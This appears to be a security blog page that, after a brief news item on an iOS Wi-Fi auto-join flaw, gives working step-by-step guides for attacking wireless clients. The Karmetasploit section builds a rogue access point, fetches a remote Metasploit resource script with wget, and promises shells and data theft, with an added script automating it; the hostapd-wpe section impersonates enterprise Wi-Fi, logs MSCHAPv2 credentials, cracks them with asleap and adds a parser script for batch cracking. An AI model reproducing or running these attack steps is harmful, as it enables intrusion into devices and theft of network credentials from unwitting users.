‘Evil’ Hack Uses Wi-Fi to Destroy Your iPhone—Maybe

Patrick Kelley mentioned in…

Security experts have found a way for a malicious hacker to dupe unwitting iPhone or iPad owners into connecting to nefarious Wi-Fi networks and potentially bricking their devices. What’s worse, those security researchers, who include Brian Krebs, among others, say that the “evil” hack is shockingly “simple” for a hacker to wreak havoc on iOS device owners.

According to Krebs, iOS comes with a feature that automatically connects a device to a wireless network it’s previously connected to, which sits at the center of the problem.


Auto-Compromising Devices with Karmetasploit

For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking perimeter firewalls and hardened servers. For this reason, I’ve begun using kits such as Karmetasploit. A Raspberry Pi running Metasploit, with nothing more than an Alfa wireless adapter and an Internet connection, is enough to get instant shells and pillage data from devices that auto-join the rogue access point.

Here is how you do it…

Install Raspbian on a Pi2 or greater.  Once this has been done, apply all of the available updates.

sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y install vim

Next, install dnsmasq.  This will be used for DNS resolution and DHCP address handouts.

sudo apt-get -y install dnsmasq

Once it is installed, configure dnsmasq by performing the following:

sudo vi /etc/dnsmasq.conf

Add the following near the top. Note that at0 is the tap interface airbase-ng creates later; dnsmasq refuses to start while a named interface does not exist, which is why it is restarted only after airbase-ng is running. No dhcp-option lines are needed, because dnsmasq hands out its own address as both router and DNS server by default.


# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=at0
#interface=wlan0mon
#interface=wlan0

# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
# service.
dhcp-range=10.10.10.50,10.10.10.150,12h

Next, install Aircrack-ng by doing the following:

sudo apt-get -y install aircrack-ng

Once this is in place, you will need to create the rules that forward all “hooked” traffic out through the Pi’s uplink (eth0 here). Run these as root rather than through sudo, since the redirect into /proc would otherwise fail:

modprobe iptable_nat
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Okay, time to start hooking devices…

Put the Alfa adapter into monitor mode first (sudo airmon-ng start wlan0 creates wlan0mon). Then start airbase-ng with a default SSID, responding to every probe request it sees (-P) and beaconing each probed ESSID for 30 seconds (-C 30). It will also create the new interface at0:

airbase-ng -P -C 30 -e "linksys" -v wlan0mon

If done properly, you will see something similar:

[Screenshot: airbase-ng output, 2016-03-17]

Open a second terminal window, issue the following to configure the interface on at0:

ifconfig at0 up 10.10.10.1 netmask 255.255.255.0

Restart dnsmasq:

service dnsmasq restart

Finally, begin autopwning devices by issuing the following command:

cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt

If done properly, you should see the following:

[Screenshot: msfconsole running karma.rc, 2016-03-17]

You can confirm this by taking a test device that has previously joined an open Wi-Fi network and opening a browser. Because airbase-ng brings up an open AP, devices will only auto-join remembered networks that were themselves open (or that the device probes for by name); a remembered WPA network will not associate. When it works, the browser should reveal the following:

[Screenshot: Karma landing page served to the client]

When successful, shells will be returned into the second console window that should be running Karmetasploit.
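The steps above, gathered into one bring-up script as an added example (this is not code from the original post). It assumes the interface names, address range and karma.rc path used in the post, that the Pi’s uplink is eth0, that the adapter is already in monitor mode as wlan0mon, and that the Debian dnsmasq service reads fragments from /etc/dnsmasq.d (it does on Raspbian). The config and rule generators are separate functions so they can be inspected without touching the system; only `sh karma-up.sh up` as root actually changes anything.

```shell
#!/bin/sh
# karma-up.sh (added example, not from the original post).
# Brings up the Karmetasploit rogue AP described above in one go.
set -e

AP_IF="${AP_IF:-at0}"          # tap interface that airbase-ng creates
MON_IF="${MON_IF:-wlan0mon}"   # monitor-mode interface (airmon-ng start wlan0)
UPLINK="${UPLINK:-eth0}"       # interface with Internet access (assumption)
GW="10.10.10.1"                # address given to at0, matches the post
RC="${RC:-/opt/karma.rc_.txt}" # resource script fetched in the post

# dnsmasq fragment for the rogue AP. dnsmasq advertises its own address as
# router and DNS server when no dhcp-option lines are given, and it fails to
# start while the named interface does not exist, so it is (re)started only
# after airbase-ng has created it.
dnsmasq_conf() {
    # $1 interface, $2 first lease address, $3 last lease address
    printf 'interface=%s\ndhcp-range=%s,%s,12h\n' "$1" "$2" "$3"
}

# Forwarding/NAT rules so victim traffic reaches the uplink.
nat_rules() {
    # $1 AP interface, $2 monitor interface, $3 uplink interface
    cat <<EOF
iptables -A FORWARD -i $2 -j ACCEPT
iptables -A FORWARD -i $1 -j ACCEPT
iptables -t nat -A POSTROUTING -o $3 -j MASQUERADE
EOF
}

karma_up() {
    [ "$(id -u)" -eq 0 ] || { echo "karma-up: run as root" >&2; return 1; }
    # /etc/dnsmasq.d is read by the Debian init script (assumption noted above)
    dnsmasq_conf "$AP_IF" 10.10.10.50 10.10.10.150 > /etc/dnsmasq.d/karma.conf
    modprobe iptable_nat
    nat_rules "$AP_IF" "$MON_IF" "$UPLINK" | sh -e
    # sysctl works under sudo where 'echo 1 > /proc/...' would not
    sysctl -w net.ipv4.ip_forward=1
    # -P answers every probe request, -C 30 beacons probed ESSIDs for 30 s
    airbase-ng -P -C 30 -e linksys -v "$MON_IF" > /tmp/airbase.log 2>&1 &
    sleep 2                      # give airbase-ng time to create $AP_IF
    ip link set "$AP_IF" up
    ip addr add "$GW/24" dev "$AP_IF"
    service dnsmasq restart
    msfconsole -q -r "$RC"
}

if [ "${1:-}" = "up" ]; then
    karma_up
fi
```

Run `dnsmasq_conf at0 10.10.10.50 10.10.10.150` or `nat_rules at0 wlan0mon eth0` from a shell that has sourced the script to review what will be written before running it for real; airbase-ng output goes to /tmp/airbase.log so the foreground terminal stays with msfconsole, where the shells come back.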

Quick Install Script – Network Assessment Tools

When you land in a foreign/client environment for an engagement, you often don’t have access to your own toolkit. For this reason, I’ve created a single shell script that installs the basic tools and a few items I use on every security assessment. As always, learn each of these tools on your own machines, as I’d rather not see you go to prison. (Some sourced from the NASA cryptobin dump.)

This script has been tested on Debian and Ubuntu.

https://gist.github.com/logikphreak/6742986688ed86ac0efa

Cracking WiFi – Enterprise

hostapd-wpe implements an IEEE 802.1X Authenticator and Authentication Server for impersonation attacks: it stands up a fake enterprise (WPA2-Enterprise/EAP) access point, captures client credentials such as MSCHAPv2 challenge/response pairs, establishes connectivity to the client, and allows further attacks where applicable.

Installation is relatively simple, but might encounter some hiccups in Ubuntu/Debian/Kali. To aid in getting you up and running, I’ve created the following guide.

Installation

Load dependencies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Stage and perform configuration steps:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
interface=eth0 to interface=wlan0 (or the interface of your choosing)
change driver=wired to #driver=wired, and make sure driver=nl80211 is set, since that is what a mac80211 wireless adapter needs
uncomment all 802.11 options and set the SSID you wish to impersonate (the target network’s name, so that clients with it in their profile will connect)

Run the following to eliminate errors on start (on newer NetworkManager releases the first command is nmcli radio wifi off):
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648

Use asleap to crack these passwords with a word list; it takes the challenge and response exactly as logged:
format = asleap -C (challenge) -R (response) -W (wordlist)

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 – actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with “/opt/SecLists/Passwords/rockyou.txt”.
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234
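Added example (not code from the original post or the hostapd-wpe project) showing how to turn a hostapd-wpe.log into cracking jobs without copying hashes by hand. It parses the username/challenge/response lines and emits both the asleap command line shown above for each capture and the colon-stripped John the Ripper NETNTLM line, which is checked against the `jtr NETNTLM:` line hostapd-wpe writes itself. The sample log is the excerpt above; the mschapv2/username header of the first entry is constructed, as it is cut off in the excerpt, and the wordlist path is the one used in the post.

```shell
#!/bin/sh
# wpe-log-to-jobs.sh (added example, not from the original post)
set -e

# Sample hostapd-wpe.log, taken from the excerpt above. The first entry's
# mschapv2/username header lines are constructed (cut off in the excerpt).
SAMPLE_LOG=$(cat <<'EOF'
mschapv2: Wed Mar 11 11:19:40 2015
username: pkelley
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648
EOF
)

# Read a hostapd-wpe log on stdin, print one asleap command per capture.
# asleap wants the colon-separated hex exactly as logged.
wpe_to_asleap() {
    # $1 wordlist path
    awk -v wl="$1" -F': ' '
        /^challenge:/ { chal = $2 }
        /^response:/  { printf "asleap -C %s -R %s -W %s\n", chal, $2, wl }
    '
}

# Read a hostapd-wpe log on stdin, print John NETNTLM lines:
#   user:$NETNTLM$<8-byte challenge hex>$<24-byte response hex>
# i.e. the same transformation hostapd-wpe applies for its jtr lines.
wpe_to_jtr() {
    awk -F': ' '
        /^username:/  { user = $2 }
        /^challenge:/ { chal = $2; gsub(":", "", chal) }
        /^response:/  { resp = $2; gsub(":", "", resp)
                        printf "%s:$NETNTLM$%s$%s\n", user, chal, resp }
    '
}

# Sanity check: our NETNTLM lines must equal the ones hostapd-wpe logged.
# Returns 0 when they match, 1 otherwise.
check_against_log() {
    ours=$(printf '%s\n' "$SAMPLE_LOG" | wpe_to_jtr)
    theirs=$(printf '%s\n' "$SAMPLE_LOG" | sed -n 's/^jtr NETNTLM: //p')
    [ "$ours" = "$theirs" ]
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | wpe_to_asleap /opt/SecLists/Passwords/rockyou.txt
    printf '%s\n' "$SAMPLE_LOG" | wpe_to_jtr
fi
```

In practice: `wpe_to_asleap rockyou.txt < hostapd-wpe.log | sh` runs asleap over every capture, and `wpe_to_jtr < hostapd-wpe.log > netntlm.txt` followed by `john --format=netntlm netntlm.txt` cracks the whole batch in one pass. Since the same user appears twice with different challenges, either tool will recover the password from whichever capture cracks first.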

Penetration Testing Platform Quick-load – Kali

When pentesting in groups or managing a small team of assessors, one of the primary challenges is quickly getting everyone on the same page. This isn’t possible on all levels. However, it is our hope that this quick GitHub script can at least get your toolkit close to a standard or, in the event of a hardware failure, get you back up and running quickly.

As always, feel free to fork the GitHub repo and improve upon it.

Installation:

  1. Perform a base-build of Kali Linux.
    Downloadable from here: Kali
  2. Navigate to /opt/
  3. Issue the following command: git clone https://github.com/logikphreak/kali-setup.git
  4. Issue this last command: sh core.sh

You will be prompted for a few platform-specific details; the general answer will be “Debian”.